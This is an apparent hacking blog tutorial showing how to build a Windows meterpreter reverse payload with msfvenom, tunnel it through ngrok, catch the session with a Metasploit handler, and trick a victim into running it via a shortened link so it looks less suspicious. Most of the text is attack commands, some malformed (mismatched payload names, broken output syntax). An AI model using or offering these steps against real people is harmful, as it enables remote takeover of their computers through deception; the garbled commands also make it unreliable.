Hackers Repository

Msfvenom with ngrok

Hi and welcome to Hacking Vision so today lets get a little more advance in are exploits were going to hack windows with a reverse http payload

let start sign up to ngrok and get the auth token

and sign up ones you got a account and get your authtoken once you got the authtoken download ngrok and unzip it with unzip /path/to/ngrok.zip once unziped gave it promising using chmod 755 ngrok then type ./ngrok authtoken <YOUR_AUTH_TOKEN> once it complete type ./ngrok http 2323 or what ever port u wanna open

and paste the ngrok url in to targets

now hit create host name and open terminal type this command msfvenom -p windows/meterpreter/http LHOST=520f6cc2.ngrok.io LPORT=2323 X> hahah.exe

now type service postgersql start

and service apache2 start

and msfconsole

now use exploit/multi/handler

set payload to windows/meterpreter/reverse_https

set lhost 127.0.0.1

set lport 2323

now type exploit and send the ngrok link to a target personalty i use link victum

me personly i shortening the link and then send it as dont look as shady

THANK YOU for reading and happy hacking lads and remember with great power comes a greater chance getting chought

To Top

Pin It on Pinterest

Share This